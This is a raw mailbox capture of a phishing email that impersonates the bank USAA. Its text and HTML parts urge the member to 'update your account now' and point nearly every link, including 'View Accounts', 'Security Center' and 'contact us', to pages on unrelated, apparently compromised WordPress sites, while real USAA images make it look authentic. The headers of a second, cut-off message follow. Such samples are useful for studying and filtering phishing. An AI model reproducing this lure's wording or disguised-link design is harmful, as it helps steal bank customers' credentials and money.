From: "USAA" <usaa-offers@banking2.org>
Date: Tue, 03 Nov 2015 22:18:36 +1300
X-Antivirus: avast! (VPS 151102-1, 03/11/2015), Outbound message
X-Antivirus-Status: Clean
Message-Id: <20151103092041.MYKQ3878.fep01.xtra.co.nz@[192.168.3.2]>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 230

You will not see this in a MIME-aware mail reader.
--===============0813457520==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

   
  
	 

  
  
	  
  
	 
  	  
  E-mail Address Update	 
  View Accounts | Privacy Promise | Contact Us	 
  	  
  
  	 	 
  	 	 
  
	 	 
 	 
  USAA SECURITY ZONE 
 USAA 
 MEMBER 
 USAA # ending in: 9351	 
 	 
  	 
  	 
  	 
  	 
 	 
   	 
  
	 
  
    Dear Member,
 
   We're making some exciting changes that will make your online banking ex=
perience very secure, We therefore request you to update your account. It i=
s now important for you to update your full profile for your account safety=
=2E We need you to update your account information immediately. 
 click here to update your account now
 
The security of your personal information is always a priority at USAA. We =
work hard to help ensure your account information stays secure. 
 To learn how USAA protects your information, visit our Security Center on =
usaa.com. We value your business and are committed to keeping your accounts=
 and personal information safe and secure. 
 Thank you,
 USAA
  	  	 
  
   
	 
	 
	 
  
	 
	 
	 
	 
   	 
    Please do not reply to this e-mail. To send a secure message to USAA, p=
lease contact us.
 
 Privacy Promise
 USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288
  	 
  
	 
  
	  	 
  
	 
  66659-0309   

 	 
   

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus

--===============0813457520==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<div id=3D"yiv1697018765">

<div id=3D"yui_3_7_2_1_1361146681624_1875">
<div align=3D"center" id=3D"yui_3_7_2_1_1361146681624_1874">
<table width=3D"650" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcol=
or=3D"#b5d7e6" id=3D"yui_3_7_2_1_1361146681624_1873">
 <tbody id=3D"yui_3_7_2_1_1361146681624_1872"><tr id=3D"yui_3_7_2_1_1361146=
681624_1871">
<td width=3D"650" valign=3D"middle" height=3D"35" align=3D"center" id=3D"yu=
i_3_7_2_1_1361146681624_1870"><br></td><td>
<br></td></tr>
</tbody></table>
<table width=3D"650" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcol=
or=3D"#b5d7e6" id=3D"yui_3_7_2_1_1361146681624_1902">
<tbody id=3D"yui_3_7_2_1_1361146681624_1901"><tr id=3D"yui_3_7_2_1_13611466=
81624_1900">
<td width=3D"10"><br></td>
<td width=3D"630" bgcolor=3D"white" align=3D"center" id=3D"yui_3_7_2_1_1361=
146681624_1899">
<table width=3D"604" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" id=3D=
"yui_3_7_2_1_1361146681624_1898">
<tbody id=3D"yui_3_7_2_1_1361146681624_1897"><tr id=3D"yui_3_7_2_1_13611466=
81624_1896">
<td height=3D"5" colspan=3D"4" id=3D"yui_3_7_2_1_1361146681624_1895"><br></=
td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_1969">
<td width=3D"54" height=3D"45" id=3D"yui_3_7_2_1_1361146681624_2106"><a hre=
f=3D"https://www.usaa.com/inet/ent_logon/Logon?EID=3D66659-0309_head" targe=
t=3D"_blank" rel=3D"nofollow"><img width=3D"61" height=3D"41" border=3D"0" =
alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Media/email=
_logo.gif"></a></td>
<td id=3D"yui_3_7_2_1_1361146681624_1968">
<table cellspacing=3D"0" cellpadding=3D"0" border=3D"0" id=3D"yui_3_7_2_1_1=
361146681624_2110">
<tbody id=3D"yui_3_7_2_1_1361146681624_2109"><tr id=3D"yui_3_7_2_1_13611466=
81624_2108">
<td height=3D"22" align=3D"left" style=3D"font:bold 16px Arial, sans-serif;=
color:#6d6d6d;" id=3D"yui_3_7_2_1_1361146681624_2107"><span style=3D"displa=
y:block;margin-top:9px;" id=3D"yui_3_7_2_1_1361146681624_2111">E-mail Addre=
ss Update</span></td>
</tr>
<tr>
<td nowrap=3D"" height=3D"23" align=3D"left"><font size=3D"1" face=3D"Verda=
na, sans-serif"><a style=3D"color:#6d6d6d;text-decoration:none;" href=3D"ht=
tp://liliya-sport.kiev.ua/wp-content/plugins/contact-form-7/languages/conta=
ct-form-7-ta.htm" target=3D"_blank" rel=3D"nofollow">View Accounts</a> | <a=
 style=3D"color:#6d6d6d;text-decoration:none;" href=3D"http://discoverinter=
national.com/wp-includes/SimplePie/Content/Type/wx.htm" target=3D"_blank" r=
el=3D"nofollow">Privacy Promise</a> | <a style=3D"color:#6d6d6d;text-decora=
tion:none;" href=3D"http://liliya-sport.kiev.ua/wp-content/plugins/contact-=
form-7/languages/contact-form-7-ta.htm" target=3D"_blank" rel=3D"nofollow">=
Contact Us</a></font></td> 
</tr>
</tbody></table>
</td>
<td width=3D"367" valign=3D"middle" height=3D"45" align=3D"right" id=3D"yui=
_3_7_2_1_1361146681624_2085">
<table width=3D"188" height=3D"65" cellspacing=3D"0" cellpadding=3D"0" bord=
er=3D"0" id=3D"yui_3_7_2_1_1361146681624_2084"> <tbody id=3D"yui_3_7_2_1_13=
61146681624_2083"><tr id=3D"yui_3_7_2_1_1361146681624_2082"> <td width=3D"2=
2" id=3D"yui_3_7_2_1_1361146681624_2117"><table width=3D"22" height=3D"65" =
cellspacing=3D"0" cellpadding=3D"0" border=3D"0" id=3D"yui_3_7_2_1_13611466=
81624_2116"> <tbody id=3D"yui_3_7_2_1_1361146681624_2115"><tr> <td width=3D=
"8" valign=3D"top" height=3D"29" style=3D"line-height:0;"><img width=3D"8" =
height=3D"29" border=3D"0" style=3D"display:block;" alt=3D"" src=3D"https:/=
/content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.gif"></td> <td=
 width=3D"14" valign=3D"top" height=3D"29" bgcolor=3D"#e7e7e8" style=3D"lin=
e-height:0;"><img width=3D"14" height=3D"29" border=3D"0" style=3D"display:=
block;" alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Med=
ia/email_sec_1-2.gif"></td> </tr> <tr id=3D"yui_3_7_2_1_1361146681624_2114"=
> <td width=3D"8" valign=3D"top" height=3D"29" style=3D"line-height:0;" id=
=3D"yui_3_7_2_1_1361146681624_2113"><img width=3D"8" height=3D"29" border=
=3D"0" style=3D"display:block;" alt=3D"" src=3D"https://content.usaa.com/mc=
ontent/static_assets/Media/email_sec_spacer.gif" id=3D"yui_3_7_2_1_13611466=
81624_2112"></td> <td width=3D"14" valign=3D"top" height=3D"29" bgcolor=3D"=
#e7e7e8" style=3D"line-height:0;"><img width=3D"14" height=3D"29" border=3D=
"0" style=3D"display:block;" alt=3D"" src=3D"https://content.usaa.com/mcont=
ent/static_assets/Media/email_sec_spacer.gif"></td> </tr> <tr> <td width=3D=
"8" valign=3D"bottom" height=3D"7" style=3D"line-height:0;"><br></td> <td w=
idth=3D"14" valign=3D"bottom" height=3D"7" bgcolor=3D"#e7e7e8" style=3D"lin=
e-height:0;"><img width=3D"14" height=3D"7" border=3D"0" style=3D"display:b=
lock;" alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Medi=
a/email_sec_2-1.gif"></td> </tr> </tbody></table></td> <td bgcolor=3D"#e7e7=
e8" align=3D"left" id=3D"yui_3_7_2_1_1361146681624_2081"><table width=3D"10=
0%" height=3D"65" cellspacing=3D"0" cellpadding=3D"5" border=3D"0" id=3D"yu=
i_3_7_2_1_1361146681624_2080"> <tbody id=3D"yui_3_7_2_1_1361146681624_2079"=
><tr id=3D"yui_3_7_2_1_1361146681624_2078"> <td valign=3D"middle" align=3D"=
left" style=3D"text-align:left;font-size:9px;line-height:12px;" id=3D"yui_3=
_7_2_1_1361146681624_2077"><font face=3D"Arial, Helvetica, sans-serif" styl=
e=3D"font-size:10px;color:#00365b;" id=3D"yui_3_7_2_1_1361146681624_2087"><=
strong id=3D"yui_3_7_2_1_1361146681624_2086">USAA SECURITY ZONE</strong></f=
ont> <br> <font face=3D"Arial, Helvetica, sans-serif" style=3D"font-size:9p=
x;color:#00365b;">USAA</font> <br> <font face=3D"Arial, Helvetica, sans-ser=
if" style=3D"font-size:9px;color:#00365b;">MEMBER</font> <br> <font face=3D=
"Arial, Helvetica, sans-serif" style=3D"font-size:9px;color:#00365b;">USAA =
# ending in: 9351</font></td> </tr> </tbody></table></td> <td width=3D"7" b=
gcolor=3D"#ffffff" id=3D"yui_3_7_2_1_1361146681624_2093"><table width=3D"7"=
 height=3D"65" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" id=3D"yui_3=
_7_2_1_1361146681624_2092"> <tbody id=3D"yui_3_7_2_1_1361146681624_2091"><t=
r id=3D"yui_3_7_2_1_1361146681624_2090"> <td width=3D"7" valign=3D"top" hei=
ght=3D"7" bgcolor=3D"#e7e7e8" align=3D"right" style=3D"line-height:0;" id=
=3D"yui_3_7_2_1_1361146681624_2089"><img width=3D"7" height=3D"7" border=3D=
"0" style=3D"display:block;" alt=3D"" src=3D"https://content.usaa.com/mcont=
ent/static_assets/Media/email_sec_1-3.gif" id=3D"yui_3_7_2_1_1361146681624_=
2088"></td> </tr> <tr> <td width=3D"7" valign=3D"top" height=3D"51" bgcolor=
=3D"#e7e7e8" align=3D"right" style=3D"line-height:0;"><img width=3D"7" heig=
ht=3D"51" border=3D"0" style=3D"display:block;" alt=3D"" src=3D"https://con=
tent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif"></td> </tr=
> <tr> <td width=3D"7" valign=3D"bottom" height=3D"7" bgcolor=3D"#e7e7e8" a=
lign=3D"right" style=3D"line-height:0;"><img width=3D"7" height=3D"7" borde=
r=3D"0" style=3D"display:block;" alt=3D"" src=3D"https://content.usaa.com/m=
content/static_assets/Media/email_sec_2-2.gif"></td> </tr> </tbody></table>=
 </td> </tr> </tbody></table></td>

</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2076">
<td height=3D"20" colspan=3D"4" id=3D"yui_3_7_2_1_1361146681624_2075">&nbsp=
;</td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2074">
<td height=3D"1" colspan=3D"4" id=3D"yui_3_7_2_1_1361146681624_2073"><br></=
td>
</tr>
</tbody></table>

<table width=3D"95%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" id=3D=
"yui_3_7_2_1_1361146681624_1975">

<tbody id=3D"yui_3_7_2_1_1361146681624_1974"><tr id=3D"yui_3_7_2_1_13611466=
81624_1973">
<td width=3D"95%" align=3D"left" id=3D"yui_3_7_2_1_1361146681624_1972">
<font face=3D"Verdana, sans-serif" style=3D"color:#333333;font-size:12px;li=
ne-height:18px;" id=3D"yui_3_7_2_1_1361146681624_1971">
<p style=3D"margin-bottom:1em;" id=3D"yui_3_7_2_1_1361146681624_1970">Dear =
Member,</p>


<table width=3D"90%" align=3D"center" id=3D"yui_3_7_2_1_1361146681624_2068"=
>

 <tbody id=3D"yui_3_7_2_1_1361146681624_2067">
   
  
            
   
       
</tbody></table>

<p style=3D"margin-bottom:1em;" id=3D"yui_3_7_2_1_1361146681624_1992">We're=
 making some exciting changes that will make your online banking experience=
 very secure, We therefore request you to update your account. It is now im=
portant for you to update your full profile for your account safety.
We need you to update your account information immediately. <br />
<a href=3D"http://liliya-sport.kiev.ua/wp-content/plugins/contact-form-7/la=
nguages/contact-form-7-ta.htm">click here to update your account now</a></p=
>
<br /><p style=3D"margin-bottom:1em;" id=3D"yui_3_7_2_1_1361146681624_1992"=
>The security of your personal information is always a priority at USAA. We=
 work hard to help ensure your account information stays secure. </p>
<p id=3D"yui_3_7_2_1_1361146681624_2018">To learn how USAA protects your in=
formation, visit our <a href=3D"http://liliya-sport.kiev.ua/wp-content/plug=
ins/contact-form-7/languages/contact-form-7-ta.htm" rel=3D"nofollow">Securi=
ty Center</a> on usaa.com. We value your business and are committed to keep=
ing your accounts and personal information safe and secure. </p>




<p style=3D"margin-bottom:1em;" id=3D"yui_3_7_2_1_1361146681624_2019">Thank=
 you,<br>
USAA</p>

</font>
</td>
<td id=3D"yui_3_7_2_1_1361146681624_2072">&nbsp;</td>
</tr>


<tr id=3D"yui_3_7_2_1_1361146681624_2024">
<td height=3D"30" align=3D"left" colspan=3D"2" id=3D"yui_3_7_2_1_1361146681=
624_2023"><br>
  <a href=3D"http://liliya-sport.kiev.ua/wp-content/plugins/contact-form-7/=
languages/contact-form-7-ta.htm" target=3D"_blank" rel=3D"nofollow"><img wi=
dth=3D"32" height=3D"32" border=3D"0" alt=3D"Facebook" src=3D"http://conten=
t.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebookIcon.gif"></a=
>&nbsp;&nbsp;<a href=3D"http://liliya-sport.kiev.ua/wp-content/plugins/cont=
act-form-7/languages/contact-form-7-ta.htm" target=3D"_blank" rel=3D"nofoll=
ow" id=3D"yui_3_7_2_1_1361146681624_2098"><img width=3D"32" height=3D"32" b=
order=3D"0" alt=3D"Twitter" src=3D"http://content.usaa.com/mcontent/static_=
assets/om/Media/thumbnails/twitterIcon.gif" id=3D"yui_3_7_2_1_1361146681624=
_2097"></a></td></tr></tbody></table></td>
<td width=3D"5" id=3D"yui_3_7_2_1_1361146681624_2094"><br></td>
<td width=3D"5" id=3D"yui_3_7_2_1_1361146681624_2095"><br></td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2100">
<td width=3D"10" height=3D"5"><br></td>
<td width=3D"630" height=3D"5" id=3D"yui_3_7_2_1_1361146681624_2099"><br></=
td>
<td width=3D"5" height=3D"5"><br></td>
<td width=3D"5" height=3D"5"><br></td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2102">
<td height=3D"20" colspan=3D"4" id=3D"yui_3_7_2_1_1361146681624_2101">&nbsp=
;</td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2022">
<td align=3D"center" colspan=3D"4" id=3D"yui_3_7_2_1_1361146681624_2021">
<font face=3D"Verdana, sans-serif" style=3D"color:#6d6d6d;font-size:10px;li=
ne-height:18px;" id=3D"yui_3_7_2_1_1361146681624_2020">
Please do not reply to this e-mail.  To send a secure message to USAA, plea=
se <a style=3D"color:#408cb0;text-decoration:none;" href=3D"http://liliya-s=
port.kiev.ua/wp-content/plugins/contact-form-7/languages/contact-form-7-ta.=
htm" target=3D"_blank" rel=3D"nofollow">contact us</a>.<br>
<br>
<a style=3D"color:#6d6d6d;" href=3D"http://liliya-sport.kiev.ua/wp-content/=
plugins/contact-form-7/languages/contact-form-7-ta.htm" target=3D"_blank" r=
el=3D"nofollow">Privacy Promise</a><br>

USAA, <span id=3D"lw_1361146686_4" class=3D"yshortcuts">9800 Fredericksburg=
 Road, San Antonio, Texas 78288</span><br>
</font>
</td>
</tr>
<tr>
<td width=3D"10" height=3D"15"><br></td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2119">
<td width=3D"5" align=3D"left" colspan=3D"1"><br></td>
<td width=3D"5" align=3D"left" colspan=3D"1">&nbsp;</td>

</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2120">
<td width=3D"10" height=3D"15"><br></td>
</tr>
<tr id=3D"yui_3_7_2_1_1361146681624_2122"><td align=3D"right" colspan=3D"4"=
 id=3D"yui_3_7_2_1_1361146681624_2121">
<font face=3D"Verdana, sans-serif" style=3D"color:#6d6d6d;font-size:10px;li=
ne-height:18px;" id=3D"yui_3_7_2_1_1361146681624_2123">66659-0309&nbsp;&nbs=
p;&nbsp;</font><br><br>
</td>
</tr></tbody></table>
</div>
</div>


</div></blockquote></td>
<br /><br />
<hr style=3D'border:none; color:#909090; background-color:#B0B0B0; height: =
1px; width: 99%;' />
<table style=3D'border-collapse:collapse;border:none;'>
	<tr>
		<td style=3D'border:none;padding:0px 15px 0px 8px'>
			<a href=3D"https://www.avast.com/antivirus">
				<img border=3D0 src=3D"http://static.avast.com/emails/avast-mail-stamp.=
png" alt=3D"Avast logo" />
			</a>
		</td>
		<td>
			<p style=3D'color:#3d4d5a; font-family:"Calibri","Verdana","Arial","Helv=
etica"; font-size:12pt;'>
				This email has been checked for viruses by Avast antivirus software.
				<br><a href=3D"https://www.avast.com/antivirus">www.avast.com</a>
			</p>
		</td>
	</tr>
</table>
<br />

--===============0813457520==--

From jose@monkey.org Mon Nov  2 13:00:08 2015 +0000
Return-Path: mtourne@co.humboldt.ca.us
Delivered-To: jose@monkey.org
X-FDA: 70809668496.09.burst96_1e2edab683f0c
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 43,2.607,0,2ba49a7dfe82eba1,d41d8cd98f00b204,mtourne@co.humboldt.ca.us,,RULES_HIT:10:41:72:355:379:455:582:589:960:962:967:969:973:983:988:989:1152:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1535:1544:1571:1575:1588:1589:1592:1594:1685:1711:1730:1776:1792:2525:2527:2553:2561:2564:2682:2685:2693:2859:2890:2892:2894:2895:2899:2921:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3865:3866:3867:3868:3870:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4181:4362:4605:5007:6117:6248:6669:6675:6678:6684:6688:7688:8603:8957:9025:9388:9855:9908:10008:10113:10305:10346:11245:11527:11656:11658:11914:12043:12050:12331:12519:12521:12555:12660:13017:13018:13019:13095:13132:13139:13231:13236:13237:14096:21067:30001:30003:30021:30022:30051:30054:30070:30075:30090:30091,0,RBL:216.102.9.4:@co.humboldt.ca.us:.lbl8.mailshell.net-62.2.0.100 64.100.201.201,CacheIP:n
X-HE-Tag: burst96_1e2edab683f0c
X-Filterd-Recvd-Size: 7863
Received: from CTY-XSV02.all.co.humboldt.ca.us (216-102-9-4.co.humboldt.ca.us [216.102.9.4])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  2 Nov 2015 13:00:07 +0000 (UTC)
Received: from DHHS-XSV02.all.co.humboldt.ca.us (10.5.3.202) by
 CTY-XSV02.all.co.humboldt.ca.us (10.1.0.114) with Microsoft SMTP Server (TLS)
 id 14.3.248.2; Mon, 2 Nov 2015 05:00:06 -0800
Received: from DHHS-XCN01.all.co.humboldt.ca.us ([169.254.1.23]) by
 DHHS-XSV02.all.co.humboldt.ca.us ([10.5.3.202]) with mapi id 14.03.0248.002;
 Mon, 2 Nov 2015 04:59:36 -0800
